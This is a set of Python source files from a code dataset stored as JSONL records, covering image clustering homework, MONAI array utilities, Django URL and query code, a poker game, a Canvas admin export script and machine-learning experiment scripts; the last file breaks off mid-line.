reaching max {} iterations\".format(cnt))\n\t\telse:\n\t\t\tpass\n\treturn classes, centroids\n\n\ndef main():\n\n\tif(len(sys.argv) < 2):\n\t\tprint(\"Please supply an image file\")\n\t\treturn\n\n\timage_file_name = sys.argv[1]\n\tK = 5 if len(sys.argv) == 2 else int(sys.argv[2])\n\tprint(image_file_name, K)\n\tim = np.asarray(imageio.imread(image_file_name))\n\n\tplt.imshow(im)\n\n\tfig, axs = plt.subplots(1, 2)\n\n\tim_vector = im.copy()\n\tim_vector.resize((im.shape[0]*im.shape[1], im.shape[2])) # added\n\n\tt1 = time.time()\n\tprint(\"Starting K-medoids Clustering\")\n\tclasses, centers = mykmedoids(im_vector, K, option=0) # Options: 0: L2 quick, 2: Matrix L2, 3: Matrix L1, 4: Matrix Linf\n\tprint(classes, centers)\n\tnew_im = np.asarray(centers[classes].reshape(im.shape), im.dtype)\n\timageio.imwrite(os.path.basename(os.path.splitext(image_file_name)[0]) + '_converted_mykmedoids_' + str(K) + os.path.splitext(image_file_name)[1], new_im)\n\taxs[0].imshow(new_im)\n\taxs[0].set_title('K-medoids')\n\tt2 = time.time()\n\tkmed_time = (t2-t1)\n\n\tt1 = time.time()\n\tprint(\"Starting K-means Clustering\")\n\tclasses, centers = mykmeans(im_vector, K)\n\tprint(classes, centers)\n\tnew_im = np.asarray(centers[classes].reshape(im.shape), im.dtype)\n\timageio.imwrite(os.path.basename(os.path.splitext(image_file_name)[0]) + '_converted_mykmeans_' + str(K) + os.path.splitext(image_file_name)[1], new_im)\n\taxs[1].imshow(new_im)\n\taxs[1].set_title('K-means')\n\tt2 = time.time()\n\tkmean_time = (t2-t1)\n\n\tplt.show()\n\n\tprint(\"Total times\\n K-mediods: {} s \\n K-Means: {} s\".format(kmed_time, kmean_time))\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"K-Medoids/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":12485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255598013","text":"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport random\n\nimport numpy as np\n\n\ndef rand_choice(prob=0.5):\n \"\"\"Returns True if a randomly chosen number is less than or equal to `prob', by default this is a 50/50 chance.\"\"\"\n return random.random() <= prob\n\n\ndef img_bounds(img):\n \"\"\"Returns the minimum and maximum indices of non-zero lines in axis 0 of `img', followed by that for axis 1.\"\"\"\n ax0 = np.any(img, axis=0)\n ax1 = np.any(img, axis=1)\n return np.concatenate((np.where(ax0)[0][[0, -1]], np.where(ax1)[0][[0, -1]]))\n\n\ndef in_bounds(x, y, margin, maxx, maxy):\n \"\"\"Returns True if (x,y) is within the rectangle (margin,margin,maxx-margin,maxy-margin).\"\"\"\n return margin <= x < (maxx - margin) and margin <= y < (maxy - margin)\n\n\ndef is_empty(img):\n \"\"\"Returns True if `img' is empty, that is its maximum value is not greater than its minimum.\"\"\"\n return not (img.max() > img.min()) # use > instead of <= so that an image full of NaNs will result in True\n\n\ndef ensure_tuple_size(tup, dim):\n \"\"\"Returns a copy of `tup' with `dim' values by either shortened or padded with zeros as necessary.\"\"\"\n tup = tuple(tup) + (0,) * dim\n return tup[:dim]\n\n\ndef zero_margins(img, margin):\n \"\"\"Returns True if the values within `margin' indices of the edges of `img' in dimensions 1 and 2 are 0.\"\"\"\n if np.any(img[:, :, :margin]) or np.any(img[:, :, -margin:]):\n return False\n\n if np.any(img[:, :margin, :]) or np.any(img[:, -margin:, :]):\n return False\n\n return True\n\n\ndef rescale_array(arr, minv=0.0, maxv=1.0, dtype=np.float32):\n \"\"\"Rescale the values of numpy array `arr' to be from `minv' to `maxv'.\"\"\"\n if dtype is not None:\n arr = arr.astype(dtype)\n\n mina = np.min(arr)\n maxa = np.max(arr)\n\n if mina == maxa:\n return arr * minv\n\n norm = (arr - mina) / (maxa - mina) # normalize the array first\n return (norm * (maxv - minv)) + minv # rescale by minv and maxv, which is the normalized array by default\n\n\ndef rescale_instance_array(arr, minv=0.0, maxv=1.0, dtype=np.float32):\n \"\"\"Rescale each array slice along the first dimension of `arr' independently.\"\"\"\n out = np.zeros(arr.shape, dtype)\n for i in range(arr.shape[0]):\n out[i] = rescale_array(arr[i], minv, maxv, dtype)\n\n return out\n\n\ndef rescale_array_int_max(arr, dtype=np.uint16):\n \"\"\"Rescale the array `arr' to be between the minimum and maximum values of the type `dtype'.\"\"\"\n info = np.iinfo(dtype)\n return rescale_array(arr, info.min, info.max).astype(dtype)\n\n\ndef copypaste_arrays(src, dest, srccenter, destcenter, dims):\n \"\"\"\n Calculate the slices to copy a sliced area of array `src' into array `dest'. The area has dimensions `dims' (use 0\n or None to copy everything in that dimension), the source area is centered at `srccenter' index in `src' and copied\n into area centered at `destcenter' in `dest'. The dimensions of the copied area will be clipped to fit within the\n source and destination arrays so a smaller area may be copied than expected. Return value is the tuples of slice\n objects indexing the copied area in `src', and those indexing the copy area in `dest'.\n\n Example:\n src=np.random.randint(0,10,(6,6))\n dest=np.zeros_like(src)\n srcslices,destslices=copypasteArrays(src,dest,(3,2),(2,1),(3,4))\n dest[destslices]=src[srcslices]\n print(src)\n print(dest)\n\n >>> [[9 5 6 6 9 6]\n [4 3 5 6 1 2]\n [0 7 3 2 4 1]\n [3 0 0 1 5 1]\n [9 4 7 1 8 2]\n [6 6 5 8 6 7]]\n [[0 0 0 0 0 0]\n [7 3 2 4 0 0]\n [0 0 1 5 0 0]\n [4 7 1 8 0 0]\n [0 0 0 0 0 0]\n [0 0 0 0 0 0]]\n \"\"\"\n srcslices = [slice(None)] * src.ndim\n destslices = [slice(None)] * dest.ndim\n\n for i, ss, ds, sc, dc, dim in zip(range(src.ndim), src.shape, dest.shape, srccenter, destcenter, dims):\n if dim:\n # dimension before midpoint, clip to size fitting in both arrays\n d1 = np.clip(dim // 2, 0, min(sc, dc))\n # dimension after midpoint, clip to size fitting in both arrays\n d2 = np.clip(dim // 2 + 1, 0, min(ss - sc, ds - dc))\n\n srcslices[i] = slice(sc - d1, sc + d2)\n destslices[i] = slice(dc - d1, dc + d2)\n\n return tuple(srcslices), tuple(destslices)\n\n\ndef resize_center(img, *resize_dims, fill_value=0):\n \"\"\"\n Resize `img' by cropping or expanding the image from the center. The `resizeDims' values are the output dimensions\n (or None to use original dimension of `img'). If a dimension is smaller than that of `img' then the result will be\n cropped and if larger padded with zeros, in both cases this is done relative to the center of `img'. The result is\n a new image with the specified dimensions and values from `img' copied into its center.\n \"\"\"\n resize_dims = tuple(resize_dims[i] or img.shape[i] for i in range(len(resize_dims)))\n\n dest = np.full(resize_dims, fill_value, img.dtype)\n half_img_shape = np.asarray(img.shape) // 2\n half_dest_shape = np.asarray(dest.shape) // 2\n\n srcslices, destslices = copypaste_arrays(img, dest, half_img_shape, half_dest_shape, resize_dims)\n dest[destslices] = img[srcslices]\n\n return dest\n\n\ndef one_hot(labels, num_classes):\n \"\"\"\n Converts label image `labels' to a one-hot vector with `num_classes' number of channels as last dimension.\n \"\"\"\n labels = labels % num_classes\n y = np.eye(num_classes)\n onehot = y[labels.flatten()]\n\n return onehot.reshape(tuple(labels.shape) + (num_classes,)).astype(labels.dtype)\n","sub_path":"monai/transforms/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"317586421","text":"from adminworkstation.models import Path\n\n# add by wangshibin 20190725\ndef DBuptdate_find_data(path_id):\n # 获取详细信息\n res = Path.objects.filter(path_id=path_id)\n line_type = res[0].path_linetype\n content = res[0].path_content\n trade_type = res[0].path_tradetype\n trade_path = res[0].path_tradepath\n remark = res[0].path_remark\n state = res[0].path_approval_state\n return line_type, content, trade_type, trade_path, remark, state\n","sub_path":"DBoperation/DBuser/DBuptdate_find_data.py","file_name":"DBuptdate_find_data.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292993283","text":"# -*- coding: utf-8 -*-\n''' Curse of Dimensionality Example \n\nPlot the average distance between points and fraction of points close to the\nedge of a unit hypercube in varying dimensional space \n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.spatial.distance as dm\nimport config as cfg\n\nplt.close()\n\ndef dimbox(ndim,nsamples):\n return np.random.rand(nsamples,ndim)\n \ndef calcfracdist(data,dist):\n num_points = data.shape[0]\n close_to_edge = np.logical_or(data > 1-dist,data < dist)\n within_range = np.any(close_to_edge,axis=1)\n num_in_range = np.count_nonzero(within_range)\n return num_in_range / num_points\n\ndef averagedistance(coordinates):\n nvalues = coordinates.shape[0]\n dist_between_points = dm.cdist(coordinates,coordinates)\n return np.mean(dist_between_points[np.triu_indices(nvalues,k=1)])\n \ndimensions = np.unique(np.round(np.logspace(0,3,50))).astype(int)\nndim = len(dimensions)\nnum_points = 1000\nfraction = np.zeros(ndim)\navg_distance = np.zeros(ndim)\n\ndistance = 0.01\nfor i,dim in enumerate(dimensions):\n print('Dim = {}'.format(dim))\n # Create the data\n data = dimbox(dim,num_points)\n # Calculate the fractional distance\n fraction[i] = calcfracdist(data,distance)\n # Calculate the average distance between points\n avg_distance[i] = averagedistance(data)\n\nplt.figure(figsize=(6,8))\nplt.subplot(2,1,1)\nplt.semilogx(dimensions,fraction,\n linewidth=2,\n color='#00B050')\nplt.xlabel('Number of Dimensions')\nplt.ylabel('Fraction of points distance < {} \\n from edge of hypercube'.format(distance))\nplt.grid('on')\n\nplt.subplot(2,1,2)\nplt.semilogx(dimensions,avg_distance,\n linewidth=2,\n color='#00B050')\nplt.xlabel('Number of Dimensions')\nplt.ylabel('Mean distance between points')\nplt.grid('on')\nplt.tight_layout()\nplt.savefig(cfg.dir_figures + 'lecture01e.png',dpi=300)","sub_path":"lecture01e.py","file_name":"lecture01e.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"284911871","text":"import avalanche as avl\nimport torch\nfrom torch.nn import CrossEntropyLoss\nfrom torch.optim import SGD\nfrom avalanche.evaluation import metrics as metrics\nfrom models import MLP\nfrom experiments.utils import set_seed, create_default_args\n\n\ndef generative_replay_smnist(override_args=None):\n \"\"\"\n \"Continual Learning with Deep Generative Replay\" by Shin et. al. (2017).\n https://arxiv.org/abs/1705.08690\n \"\"\"\n args = create_default_args({'cuda': 0, 'hidden_size': 400,\n 'hidden_layers': 2, 'epochs': 10, 'dropout': 0,\n 'learning_rate': 0.001, 'train_mb_size': 16, 'seed': None}, override_args)\n set_seed(args.seed)\n device = torch.device(f\"cuda:{args.cuda}\"\n if torch.cuda.is_available() and\n args.cuda >= 0 else \"cpu\")\n\n benchmark = avl.benchmarks.SplitMNIST(5, return_task_id=False)\n model = MLP(hidden_size=args.hidden_size, hidden_layers=args.hidden_layers,\n drop_rate=args.dropout, relu_act=True)\n criterion = CrossEntropyLoss()\n\n interactive_logger = avl.logging.InteractiveLogger()\n\n evaluation_plugin = avl.training.plugins.EvaluationPlugin(\n metrics.accuracy_metrics(epoch=True, experience=True, stream=True),\n loggers=[interactive_logger])\n\n cl_strategy = avl.training.GenerativeReplay(\n model,\n torch.optim.Adam(model.parameters(), lr=args.learning_rate),\n criterion,\n train_mb_size=args.train_mb_size,\n train_epochs=args.epochs,\n eval_mb_size=128,\n replay_size=100,\n device=device,\n evaluator=evaluation_plugin,\n )\n\n res = None\n for experience in benchmark.train_stream:\n cl_strategy.train(experience)\n res = cl_strategy.eval(benchmark.test_stream)\n\n return res\n\n\nif __name__ == '__main__':\n res = generative_replay_smnist()\n print(res)\n","sub_path":"experiments/split_mnist/generative_replay.py","file_name":"generative_replay.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"220950837","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nfrom cms.sitemaps import CMSSitemap\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.sitemaps.views import sitemap as sitemap_view\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.views.static import serve as serve_static\n\nfrom attendee.views import (\n AttendeeCancelView, AttendeeDeleteView, AttendeeProfileView,\n AttendeeRegistrationView, RegisterSuccessView,\n login_or_register_attendee_view)\nfrom devday.views import exception_test_view\nfrom talk.views import (\n InfoBeamerXMLView, RedirectVideoView, SpeakerListView, SpeakerProfileView,\n TalkDetails, TalkListPreviewView, TalkListView, TalkVideoView)\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^sitemap\\.xml$', sitemap_view, {'sitemaps': {'cmspages': CMSSitemap}}),\n url(r'^select2/', include('django_select2.urls')),\n url(r'^attendee/register/$', AttendeeRegistrationView.as_view(), name='registration_register'),\n url(r'^attendee/cancel/(?P\\d+)$', AttendeeCancelView.as_view(), name='attendee_cancel'),\n url(r'^register/$', login_or_register_attendee_view, name='login_or_register_attendee'),\n url(r'^register/success/$', RegisterSuccessView.as_view(), name='register_success'),\n url(r'^accounts/', include('devday.registration_urls')),\n url(r'^accounts/delete/$', AttendeeDeleteView.as_view(), name='attendee_delete'),\n url(r'^accounts/profile/$', AttendeeProfileView.as_view(), name='user_profile'),\n url(r'^speakers/$', SpeakerListView.as_view(), name='speaker_list'),\n url(r'^schedule\\.xml$', InfoBeamerXMLView.as_view()),\n url(r'^(?P[^/]+)/schedule\\.xml$', InfoBeamerXMLView.as_view()),\n url(r'^videos/$', RedirectVideoView.as_view()),\n url(r'^speaker/profile/(?P\\d+)/$', SpeakerProfileView.as_view(), name='speaker_profile'),\n url(r'^upload/', include('django_file_form.urls')),\n url(r'^session/', include('talk.urls')),\n url(r'^committee/', include('talk.urls_committee')),\n url(r'^synthetic_server_error/$', exception_test_view),\n url(r'^(?P[^/]+)/talk-preview/$', TalkListPreviewView.as_view(), name='session_list_preview'),\n url(r'^(?P[^/]+)/talk/$', TalkListView.as_view(), name='session_list'),\n url(r'^(?P[^/]+)/videos/$', TalkVideoView.as_view(), name='video_list'),\n url(r'^(?P[^/]+)/talk/(?P[^/]+)/$', TalkDetails.as_view(), name='talk_details'),\n url(r'^', include('cms.urls')),\n url(r'^csvviews/', include('attendee.csv_urls')),\n]\n\n# This is only needed when using runserver.\nif settings.DEBUG: # pragma: nocover\n import debug_toolbar\n\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls)),\n url(r'^media/(?P.*)$', serve_static, # NOQA\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n ] + staticfiles_urlpatterns() + urlpatterns # NOQA\n","sub_path":"devday/devday/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"272044448","text":"from TeamPokerMainApp.Common.VariableDefinitions import *\nfrom TeamPokerMainApp.Player.PlayerProfile import PlayerProfile\nfrom TeamPokerMainApp.PokerGame.GameLogic.CardDeck import CardDeck\nfrom TeamPokerMainApp.PokerGame.GameLogic.Dealer import Dealer\nfrom TeamPokerMainApp.PokerGame.GameLogic.HandEvaluator import HandEvaluator\nimport numpy as np\n\n\nclass PokerGame:\n numberOfPlayers = 0\n maximumPlayers = 9\n\n def __init__(self):\n self._dealer = Dealer()\n self._deck = CardDeck()\n self._player0 = PlayerProfile()\n self._player1 = PlayerProfile()\n self._player2 = PlayerProfile()\n self._player3 = PlayerProfile()\n self._player4 = PlayerProfile()\n self._player5 = PlayerProfile()\n self._player6 = PlayerProfile()\n self._player7 = PlayerProfile()\n self._player8 = PlayerProfile()\n\n def addNewPlayer(self, name, money):\n if self.numberOfPlayers < 8:\n eval(f'self._player{self.numberOfPlayers}.createNewPlayer(name, money)')\n self.numberOfPlayers += 1\n else:\n print('Table is full!')\n\n def removePlayer(self, playerNumber):\n self.numberOfPlayers -= 1\n eval(f'self._player{playerNumber}.clearPlayer()')\n\n def newPokerRound(self):\n self._dealer.clearCardsOnTheTableAndPot()\n self.deck = self._deck.get_shuffled_deck()\n self._deck.print_shuffled_deck(self.deck)\n # start giving cards to players\n for card in range(NUMBER_OF_CARDS_IN_HAND):\n for player in range(self.maximumPlayers):\n if eval(f'self._player{player}.getPlayingStatus()') is STATUS_PLAYING:\n eval(f'self._player{player}.setCardsInPlayerHand(card, self.get_top_card())')\n\n def card_round_flop(self):\n self.get_top_card() # just removes top card from the deck, to burn it\n for card in range(NUMBER_OF_CARDS_ON_FLOP):\n self._dealer.setCardsOnTheTable(card, self.get_top_card())\n\n def card_round_turn(self):\n self.get_top_card() # just removes top card from the deck, to burn it\n self._dealer.setCardsOnTheTable(CARD_INDEX_TURN, self.get_top_card())\n\n def card_round_river(self):\n self.get_top_card() # just removes top card from the deck, to burn it\n self._dealer.setCardsOnTheTable(CARD_INDEX_RIVER, self.get_top_card())\n\n def get_top_card(self):\n topCard = self.deck[CARD_INDEX_TOP_CARD]\n self.deck = np.delete(self.deck, CARD_INDEX_TOP_CARD)\n return topCard\n\n def printPlayerHands(self):\n for player in range(self.numberOfPlayers):\n printingString = eval(f'self._player{player}.name')\n for item in eval(f'self._player{player}.getCardsInPlayerHand()'):\n printingString += ' '\n printingString += self._deck.get_card_name_from_card_number(item)\n\n print(printingString)\n\n def printTableCards(self):\n prnt = ''\n for card in self._dealer.getCardsOnTheTable():\n if card is not NO_CARD:\n prnt += ' '\n prnt += self._deck.get_card_name_from_card_number(card)\n print(prnt)\n\n def takePlayerCardsPlusTableCards(self, playerID):\n sevenCards = []\n for card in eval(f'self._player{playerID}.getCardsInPlayerHand()'):\n sevenCards.append(self._deck.get_card_number_from_card_id(card))\n for card in self._dealer.getCardsOnTheTable():\n sevenCards.append(self._deck.get_card_number_from_card_id(card))\n return sevenCards\n\n def evaluatePlayersHands(self):\n print(\"\\nResults:\")\n for player in range(self.numberOfPlayers):\n playerName = eval(f'self._player{player}.name')\n sevenCards = self.takePlayerCardsPlusTableCards(player)\n handEvaluator = HandEvaluator(sevenCards, playerName)\n result = handEvaluator.evaluate_hand()\n print(result)\n\n\ngame = PokerGame()\ngame.addNewPlayer('Victor', 10.0)\ngame.addNewPlayer('Cornel', 10.0)\ngame.addNewPlayer('Csaba', 10.0)\ngame.addNewPlayer('Adi', 10.0)\ngame.addNewPlayer('Andrei', 10.0)\n\ngame.newPokerRound()\nprint('----')\ngame.printPlayerHands()\nprint('----')\nprint('Flop: ')\ngame.card_round_flop()\ngame.printTableCards()\nprint('Turn: ')\ngame.card_round_turn()\ngame.printTableCards()\nprint('River: ')\ngame.card_round_river()\ngame.printTableCards()\ngame.evaluatePlayersHands()\n","sub_path":"~examples_and_tests/first_test.py","file_name":"first_test.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156913677","text":"from canvasapi import Canvas\nimport config\nimport csv\n\ncanvas = Canvas(config.API_URL, config.API_KEY)\n\naccountIDs = [6,7,8,9,10,11,12,13,14,15,16,17,18]\n\nfilename = \"DOE_Admin.csv\"\n\ncsv = open(filename, \"w\")\ncsv.write(\"username,role,role_id,subaccount\\n\")\n\ndef build_admin_lst(account, mode):\n\n print(\"\\n_______________________\\n\" + \"Admin's for: \" + str(account))\n root_admins = account.get_admins()\n print(\"*****Root Admins*****\\n\")\n\n for admin in root_admins: # Grabs all root level Admin Users\n user = admin.user\n role = admin.role\n print(\"Name: \" + user['login_id'] + \" -> Role: \" + role)\n\n csv.write(str(user['login_id'])+\",\"+role+\",\"+str(admin.id)+\",\"+str(account)+\"\\n\")\n\n\n if mode == \"all\":\n subaccounts = account.get_subaccounts(True) # Get all subaccounts in an account\n for subaccount in subaccounts:\n #print(\" \" + str(subaccount))\n admins = subaccount.get_admins() # Get all Admin Users\n tmp = []\n for admin in admins:\n user = admin.user\n role = admin.role\n # print(\" Name: \" + user['name'] + \" -> Role: \" + role)\n\n else:\n return None\n\n\nfor ID in accountIDs:\n current_account = canvas.get_account(ID)\n\n build_admin_lst(current_account, \"root\") # Account, Mode(\"root\" or \"all\")\n\nprint(\"Your .CSV is done...\")","sub_path":"get_admins.py","file_name":"get_admins.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"306415465","text":"import sys\nfrom pathlib import Path\nfrom utils_chess import *\nfrom datasets import PascalVOCDataset, ChessDataset\nfrom tqdm import tqdm\nfrom pprint import PrettyPrinter\nfrom argparser import parse_val_arguments\n\n# Good formatting when printing the APs for each class and mAP\npp = PrettyPrinter()\n\n# Parameters\nkeep_difficult = True # difficult ground truth objects must always be considered in mAP calculation, because these objects DO exist!\nworkers = 4\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef evaluate(checkpoint, run_colab, batch_size, set, subset):\n \"\"\"\n Evaluate.\n\n :param test_loader: DataLoader for test data\n :param model: model\n \"\"\"\n if run_colab:\n root_path = Path(\"/content/gdrive/My Drive/Chess notation/annotated\")\n else:\n root_path = \"/Users/laurenssamson/Documents/Projects/Chess_notation/chess/data/chess_data\"\n test_dataset = ChessDataset(root_path)\n if subset > 0:\n test_dataset.images = test_dataset.images[:subset]\n test_dataset.objects = test_dataset.objects[:subset]\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False,\n collate_fn=test_dataset.collate_fn, num_workers=workers, pin_memory=True)\n # Load model checkpoint that is to be evaluated\n checkpoint = torch.load(checkpoint, map_location=device)\n model = checkpoint['model']\n print(f\"Number of epoch trained: {checkpoint['epoch']}\")\n model = model.to(device)\n\n # Switch to eval mode\n model.eval()\n # Make sure it's in eval mode\n model.eval()\n\n # Lists to store detected and true boxes, labels, scores\n det_boxes = list()\n det_labels = list()\n det_scores = list()\n true_boxes = list()\n true_labels = list()\n true_difficulties = list() # it is necessary to know which objects are 'difficult', see 'calculate_mAP' in utils.py\n\n with torch.no_grad():\n # Batches\n for i, (images, boxes, labels, difficulties) in enumerate(tqdm(test_loader, desc='Evaluating')):\n images = images.to(device) # (N, 3, 300, 300)\n\n # Forward prop.\n predicted_locs, predicted_scores = model(images)\n\n # Detect objects in SSD output\n det_boxes_batch, det_labels_batch, det_scores_batch = model.detect_objects(predicted_locs, predicted_scores,\n min_score=0.01, max_overlap=0.45,\n top_k=200)\n # Evaluation MUST be at min_score=0.01, max_overlap=0.45, top_k=200 for fair comparision with the paper's results and other repos\n\n # Store this batch's results for mAP calculation\n boxes = [b.cpu() for b in boxes]\n labels = [l.cpu()for l in labels]\n difficulties = [d.cpu() for d in difficulties]\n\n det_boxes.extend([box.cpu() for box in det_boxes_batch])\n det_labels.extend([label.cpu() for label in det_labels_batch])\n det_scores.extend([score.cpu() for score in det_scores_batch])\n true_boxes.extend(boxes)\n true_labels.extend(labels)\n true_difficulties.extend(difficulties)\n\n # Calculate mAP\n APs, mAP = calculate_mAP(det_boxes, det_labels, det_scores, true_boxes, true_labels, true_difficulties)\n\n # Print AP for each class\n pp.pprint(APs)\n\n print('\\nMean Average Precision (mAP): %.3f' % mAP)\n model.train()\n\nif __name__ == '__main__':\n args = parse_val_arguments(sys.argv[1:])\n evaluate(**args)\n\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"347146932","text":"import pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom matplotlib import pyplot as plt\nimport time\nimport os\nimport numpy as np\nimport sys\n\ntime1 = time.time()\n#Daten einlesen\nlocation = input(\"Auf welchem Rechner?\")\nroot_path = \"//\"\nif location == \"Taurus\" or location == \"taurus\":\n root_path = \"/home/s1388135/Bachelor-Thesis/\"\nsys.path.insert(0, root_path)\nimport ml\n\n\n\n#Grid erstellen, pool für jeden Hyperparameter, so kann man dynamische einstellen in welchen Dimensionen das Grid liegt\n# wichtig: Standardmodell hat index 0 in jedem pool\npools = dict()\npools[\"batch_size\"] = [256, 512, 768, 1024, 128]\npools[\"units_nr_layers\"] = [(256,5), (512,3), (64,7), (1024, 2), (128, 6)]\npools[\"learning_rate\"]= [1e-2, 1e-3, 1e-4, 5e-3]\npools[\"l2_kernel\"] = [0.0]\npools[\"l2_bias\"] = [0.0]\npools[\"loss_fn\"] = [keras.losses.MeanAbsoluteError(), keras.losses.MeanSquaredError(), keras.losses.Huber()]\npools[\"optimizer\"] = [keras.optimizers.Adam, keras.optimizers.RMSprop]\npools[\"momentum\"] = [0.1]\npools[\"dropout\"] = [False]\npools[\"dropout_rate\"] = [0]\npools[\"kernel_initializer\"] = [tf.keras.initializers.HeNormal()]\npools[\"bias_initializer\"] = [tf.keras.initializers.Zeros()]\npools[\"hidden_activation\"] = [tf.nn.leaky_relu, tf.nn.relu, tf.nn.elu, tf.nn.sigmoid, tf.nn.tanh]\npools[\"output_activation\"] = [ml.LinearActiavtion()]\npools[\"feature_normalization\"] = [\"normalization\", None]\npools[\"scaling_bool\"] = [True]\npools[\"logarithm\"] = [True]\npools[\"base10\"] = [True, False]\npools[\"label_normalization\"] = [True, False]\npools[\"min_delta\"] = [5e-6]\npools[\"min_lr\"] = [5e-8]\npools[\"dataset\"] =[ \"TrainingData4M\"]\n#Festlegen, welche Hyperparameter in der Bezeichnung stehen sollen:\nnames = {\"loss_fn\", \"units_nr_layers\", \"optimizer\", \"hidden_activation\", \"dataset\", \"batch_size\",\n \"learning_rate\", \"units_nr_layers\", \"label_normalization\", \"base10\", \"feature_normalization\", }\n\nvary_multiple_parameters = True\n\n#Variablen...\ntrain_frac = 0.95\ntraining_epochs = 100\nsize = 100\nlr_reduction=0.05\nlr_factor = 0.5\nnesterov = True\nloss_function = keras.losses.MeanAbsolutePercentageError()\nfeature_rescaling = False\n\ncustom = False\nnew_model=True\n\nlr_patience = 1\nstopping_patience = 3\nrepeat = 2\n\n\n\n#Menge mit bereits gesehen konfigurationen\nchecked_configs = ml.create_param_configs(pools=pools, size=size, vary_multiple_parameters=vary_multiple_parameters)\nresults_list = dict()\n\nfor config in checked_configs:\n #Schönere accessability\n params = dict()\n for i,param in enumerate(pools):\n params[param] = config[i]\n\n data_path = root_path + \"/Files/Hadronic/Data/\" + params[\"dataset\"] + \"/\"\n data_name = \"all\"\n project_path = root_path + \"Files/Hadronic/Models/LastRandomSearch/\"\n if not vary_multiple_parameters:\n project_path += str(config[-1]) + \"/\"\n loss_name = \"best_loss\"\n project_name = \"\"\n\n label_name = \"WQ\"\n\n if params[\"feature_normalization\"] == \"rescaling\":\n feature_rescaling = True\n elif params[\"feature_normalization\"] == \"normalization\":\n feature_normalization = True\n \n #Trainingsparameter ein wenig nach batches anpassen\n training_epochs = int(1/100 * params[\"batch_size\"]) + 90\n lr_reduction = 25/params[\"batch_size\"]\n\n #Callbacks initialisieren\n #min delta initialiseren\n reduce_lr = keras.callbacks.LearningRateScheduler(ml.class_scheduler(reduction=lr_reduction, min_lr=params[\"min_lr\"]))\n reduce_lr_on_plateau = keras.callbacks.ReduceLROnPlateau(monitor=\"loss\", factor=lr_factor, patience=lr_patience, min_delta=params[\"min_delta\"], min_lr=params[\"min_lr\"])\n early_stopping = keras.callbacks.EarlyStopping(monitor=\"loss\", min_delta=1e-1 * params[\"min_delta\"], patience=stopping_patience)\n callbacks = [reduce_lr_on_plateau, early_stopping, reduce_lr]\n\n # Daten einlsen\n # Daten einlesen:\n (training_data, train_features, train_labels, test_features, test_labels, transformer) = ml.data_handling(\n data_path=data_path + data_name, label_name=label_name, scaling_bool=params[\"scaling_bool\"], logarithm=pools[\"logarithm\"], base10=params[\"base10\"],\n label_normalization=params[\"label_normalization\"], feature_rescaling=feature_rescaling,\n train_frac=train_frac)\n\n\n #Create path to save model\n if not vary_multiple_parameters:\n names = {config[-1]}\n model_name = ml.construct_name(params, names_set=names)\n save_path = project_path + model_name\n print(\"Wir initialisieren Modell \", model_name)\n\n #Best loss einlesen\n best_losses = None\n if os.path.exists(project_path + project_name + loss_name):\n best_losses = pd.read_csv(project_path + project_name + loss_name)\n\n # Verzeichnis erstellen\n if not os.path.exists(path=save_path):\n os.makedirs(save_path)\n\n\n #zweimal initialisiern um statistische Schwankungen zu verkleinern\n #trainin_time und total loss über die initialisierungen mitteln\n training_time = 0\n total_losses = []\n models = []\n for i in range(repeat):\n #Modell initialisieren\n models.append(ml.initialize_model(nr_layers=params[\"units_nr_layers\"][1], units=params[\"units_nr_layers\"][0], loss_fn=params[\"loss_fn\"], optimizer=params[\"optimizer\"],\n hidden_activation=params[\"hidden_activation\"], output_activation=params[\"output_activation\"],\n kernel_initializer=params[\"kernel_initializer\"], bias_initializer=params[\"bias_initializer\"], l2_kernel=params[\"l2_kernel\"],\n learning_rate=params[\"learning_rate\"], momentum=params[\"momentum\"], nesterov=nesterov,\n l2_bias=params[\"l2_bias\"], dropout=params[\"dropout\"], dropout_rate=params[\"dropout_rate\"],\n new_model=new_model, custom=custom, feature_normalization=pools[\"feature_normalization\"]))\n for i,model in enumerate(models):\n # Training starten\n time4 = time.time()\n history = 